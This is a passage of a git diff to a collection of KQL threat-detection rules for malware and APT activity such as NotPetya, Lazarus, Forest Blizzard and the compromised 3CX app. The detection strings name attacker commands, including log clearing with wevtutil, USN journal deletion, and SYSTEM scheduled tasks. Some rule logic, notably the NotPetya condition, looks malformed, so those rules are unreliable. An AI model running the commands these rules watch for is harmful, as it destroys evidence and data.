Evasion/flowcloud_registry_markers.kql index 4f3041d9..27c971e5 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql @@ -1,13 +1,13 @@ -// Title: FlowCloud Registry Markers -// Author: NVISO -// Date: 2020-06-09 -// Level: critical -// Description: Detects FlowCloud malware registry markers from threat group TA410. -// The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: FlowCloud Registry Markers +// Author: NVISO +// Date: 2020-06-09 +// Level: critical +// Description: Detects FlowCloud malware registry markers from threat group TA410. +// The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey contains "\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}" or RegistryKey contains "\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" or RegistryKey contains "\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" or RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql index e188b769..3f7ccead 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql @@ -1,13 +1,13 @@ -// Title: Forest Blizzard APT - File Creation Activity -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-04-23 -// Level: high -// Description: Detects the creation of specific files inside of ProgramData directory. -// These files were seen being created by Forest Blizzard as described by MSFT. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Forest Blizzard APT - File Creation Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the creation of specific files inside of ProgramData directory. +// These files were seen being created by Forest Blizzard as described by MSFT. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where ((FolderPath contains "\\prnms003.inf_" or FolderPath contains "\\prnms009.inf_") and (FolderPath startswith "C:\\ProgramData\\Microsoft\\v" or FolderPath startswith "C:\\ProgramData\\Adobe\\v" or FolderPath startswith "C:\\ProgramData\\Comms\\v" or FolderPath startswith "C:\\ProgramData\\Intel\\v" or FolderPath startswith "C:\\ProgramData\\Kaspersky Lab\\v" or FolderPath startswith "C:\\ProgramData\\Bitdefender\\v" or FolderPath startswith "C:\\ProgramData\\ESET\\v" or FolderPath startswith "C:\\ProgramData\\NVIDIA\\v" or FolderPath startswith "C:\\ProgramData\\UbiSoft\\v" or FolderPath startswith "C:\\ProgramData\\Steam\\v")) or (FolderPath startswith "C:\\ProgramData\\" and ((FolderPath endswith ".save" or FolderPath endswith "\\doit.bat" or FolderPath endswith "\\execute.bat" or FolderPath endswith "\\servtask.bat") or (FolderPath contains "\\wayzgoose" and FolderPath endswith ".dll"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql index cad7ef5f..bc45385d 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql @@ -1,13 +1,13 @@ -// Title: Forest Blizzard APT - JavaScript Constrained File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-04-23 -// Level: medium -// Description: Detects the creation of JavaScript files inside of the DriverStore directory. -// Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Forest Blizzard APT - JavaScript Constrained File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: medium +// Description: Detects the creation of JavaScript files inside of the DriverStore directory. +// Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith "\\.js" and FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql index f57c76cd..3daa2658 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql @@ -1,11 +1,11 @@ -// Title: Forest Blizzard APT - Process Creation Activity -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-04-23 -// Level: high -// Description: Detects the execution of specific processes and command line combination. -// These were seen being created by Forest Blizzard as described by MSFT. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats - -DeviceProcessEvents +// Title: Forest Blizzard APT - Process Creation Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the execution of specific processes and command line combination. +// These were seen being created by Forest Blizzard as described by MSFT. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats + +DeviceProcessEvents | where (SHA256 startswith "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 startswith "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5") or (ProcessCommandLine contains "Get-ChildItem" and ProcessCommandLine contains ".save" and ProcessCommandLine contains "Compress-Archive -DestinationPath C:\\ProgramData\\") or ((ProcessCommandLine contains "servtask.bat" or ProcessCommandLine contains "execute.bat" or ProcessCommandLine contains "doit.bat") and (ProcessCommandLine contains "Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "SYSTEM" and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") or ((ProcessCommandLine contains "Delete" and ProcessCommandLine contains "/F " and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql b/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql index 60139c6e..ce83edc5 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql @@ -1,10 +1,10 @@ -// Title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-31 -// Level: high -// Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats - -DeviceProcessEvents +// Title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-31 +// Level: high +// Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine endswith "\\1.dll, DllRegisterServer" or ProcessCommandLine endswith " 1.dll, DllRegisterServer") and FolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql index 6a337236..2b16cf5e 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql @@ -1,10 +1,10 @@ -// Title: Kapeka Backdoor Execution Via RunDLL32.EXE -// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-03 -// Level: high -// Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats - -DeviceProcessEvents +// Title: Kapeka Backdoor Execution Via RunDLL32.EXE +// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-03 +// Level: high +// Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local") and ((ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1" and ProcessCommandLine contains " -d") or (ProcessCommandLine contains ".wll" and ProcessCommandLine endswith "#1")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql index 63635772..c4eb1c3d 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql @@ -1,12 +1,12 @@ -// Title: Lazarus APT DLL Sideloading Activity -// Author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-18 -// Level: high -// Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001, attack.g0032, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Lazarus APT DLL Sideloading Activity +// Author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: high +// Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001, attack.g0032, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\colorcpl.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\colorui.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\tabcal.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\HID.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Oracle\\Java\\fixmapi.exe" and FolderPath =~ "C:\\ProgramData\\Oracle\\Java\\mapistub.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramShared\\PresentationHost.exe" and FolderPath =~ ":\\ProgramShared\\mscoree.dll") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql b/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql index 58cbc6eb..577ea20e 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql @@ -1,12 +1,12 @@ -// Title: Lazarus System Binary Masquerading -// Author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) -// Date: 2020-06-03 -// Level: high -// Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Lazarus System Binary Masquerading +// Author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) +// Date: 2020-06-03 +// Level: high +// Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\msdtc.exe" or FolderPath endswith "\\gpsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql b/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql index 03e80c6b..1f4c3a8a 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql @@ -1,12 +1,12 @@ -// Title: Malicious DLL Load By Compromised 3CXDesktopApp -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-31 -// Level: critical -// Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Malicious DLL Load By Compromised 3CXDesktopApp +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-31 +// Level: critical +// Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (SHA256 startswith "7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896" or SHA256 startswith "11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03" or SHA256 startswith "F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952" or SHA256 startswith "8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423") or (SHA1 startswith "BF939C9C261D27EE7BB92325CC588624FCA75429" or SHA1 startswith "20D554A80D759C50D6537DD7097FED84DD258B3E" or SHA1 startswith "894E7D4FFD764BB458809C7F0643694B036EAD30" or SHA1 startswith "3B3E778B647371262120A523EB873C20BB82BEAF") or (MD5 startswith "74BC2D0B6680FAA1A5A76B27E5479CBC" or MD5 startswith "82187AD3F0C6C225E2FBA0C867280CC9" or MD5 startswith "11BC82A9BD8297BD0823BCE5D6202082" or MD5 startswith "7FAEA2B01796B80D180399040BB69835") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql index 6f1cf2ee..38aaae2e 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql @@ -1,10 +1,10 @@ -// Title: NotPetya Ransomware Activity -// Author: Florian Roth (Nextron Systems), Tom Ueltschi -// Date: 2019-01-16 -// Level: critical -// Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, attack.t1070.001, attack.credential-access, attack.t1003.001, car.2016-04-002, detection.emerging-threats - -DeviceProcessEvents +// Title: NotPetya Ransomware Activity +// Author: Florian Roth (Nextron Systems), Tom Ueltschi +// Date: 2019-01-16 +// Level: critical +// Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, attack.t1070.001, attack.credential-access, attack.t1003.001, car.2016-04-002, detection.emerging-threats + +DeviceProcessEvents | where "\\perfc.dat" or ((ProcessCommandLine endswith ".dat,#1" or ProcessCommandLine endswith ".dat #1" or ProcessCommandLine endswith ".zip.dll\",#1") and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine contains "wevtutil cl Application & fsutil usn deletejournal /D C:" or ProcessCommandLine contains "dllhost.dat %WINDIR%\\ransoms") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql index e89e99dc..2b2918a2 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql @@ -1,10 +1,10 @@ -// Title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE -// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-01-26 -// Level: high -// Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats - -DeviceProcessEvents +// Title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE +// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-01-26 +// Level: high +// Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Installer\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf,") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".cpl\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".inf" or ProcessCommandLine endswith ".inf\"" or ProcessCommandLine endswith ".cpl'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".inf'")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql index aab412c6..d73050a1 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql @@ -1,10 +1,10 @@ -// Title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 -// Author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-02 -// Level: medium -// Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 +// Author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-02 +// Level: medium +// Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "\\AppData\\Local\\" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains ",DllEntry" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql index 8985cf3b..ba655e8f 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential Compromised 3CXDesktopApp Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-29 -// Level: high -// Description: Detects execution of known compromised version of 3CXDesktopApp -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats -// False Positives: -// - Legitimate usage of 3CXDesktopApp - -DeviceProcessEvents +// Title: Potential Compromised 3CXDesktopApp Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-29 +// Level: high +// Description: Detects execution of known compromised version of 3CXDesktopApp +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats +// False Positives: +// - Legitimate usage of 3CXDesktopApp + +DeviceProcessEvents | where ((ProcessVersionInfoOriginalFileName =~ "3CXDesktopApp.exe" or FolderPath endswith "\\3CXDesktopApp.exe" or ProcessVersionInfoProductName =~ "3CX Desktop App") and ProcessVersionInfoProductVersion contains "18.12.") or ((SHA256 startswith "DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC" or SHA256 startswith "54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02" or SHA256 startswith "D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE" or SHA256 startswith "FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405" or SHA256 startswith "5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734" or SHA256 startswith "A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203" or SHA256 startswith "AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868" or SHA256 startswith "59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983") or (SHA1 startswith "480DC408EF50BE69EBCF84B95750F7E93A8A1859" or SHA1 startswith "3B43A5D8B83C637D00D769660D01333E88F5A187" or SHA1 startswith "6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA" or SHA1 startswith "E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1" or SHA1 startswith "8433A94AEDB6380AC8D4610AF643FB0E5220C5CB" or SHA1 startswith "413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5" or SHA1 startswith "BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA" or SHA1 startswith "BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E") or (MD5 startswith "BB915073385DD16A846DFA318AFA3C19" or MD5 startswith "08D79E1FFFA244CC0DC61F7D2036ACA9" or MD5 startswith "4965EDF659753E3C05D800C6C8A23A7A" or MD5 startswith "9833A4779B69B38E3E51F04E395674C6" or MD5 startswith "704DB9184700481A56E5100FB56496CE" or MD5 startswith "8EE6802F085F7A9DF7E0303E65722DC0" or MD5 startswith "F3D4144860CA10BA60F7EF4D176CC736" or MD5 startswith "0EEB1C0133EB4D571178B2D9D14CE3E9")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql index 7e7e0e57..a160a293 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential Compromised 3CXDesktopApp Update Activity -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-29 -// Level: high -// Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Compromised 3CXDesktopApp Update Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-29 +// Level: high +// Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "--update" and ProcessCommandLine contains "http" and ProcessCommandLine contains "/electron/update/win32/18.12") and FolderPath endswith "\\3CXDesktopApp\\app\\update.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql index 68d1c51c..3b1c17b9 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql @@ -1,12 +1,12 @@ -// Title: Potential Devil Bait Malware Reconnaissance -// Author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea) -// Date: 2023-05-15 -// Level: high -// Description: Detects specific process behavior observed with Devil Bait samples -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Devil Bait Malware Reconnaissance +// Author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea) +// Date: 2023-05-15 +// Level: high +// Description: Detects specific process behavior observed with Devil Bait samples +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine matches regex "ipconfig\\s+/all" or (ProcessCommandLine contains "dir" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist")) and (ProcessCommandLine contains ">>%APPDATA%\\Microsoft\\" and (ProcessCommandLine endswith ".xml" or ProcessCommandLine endswith ".txt") and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql index 330a18cb..51270f60 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql @@ -1,12 +1,12 @@ -// Title: Potential Devil Bait Related Indicator -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: high -// Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Potential Devil Bait Related Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC +// 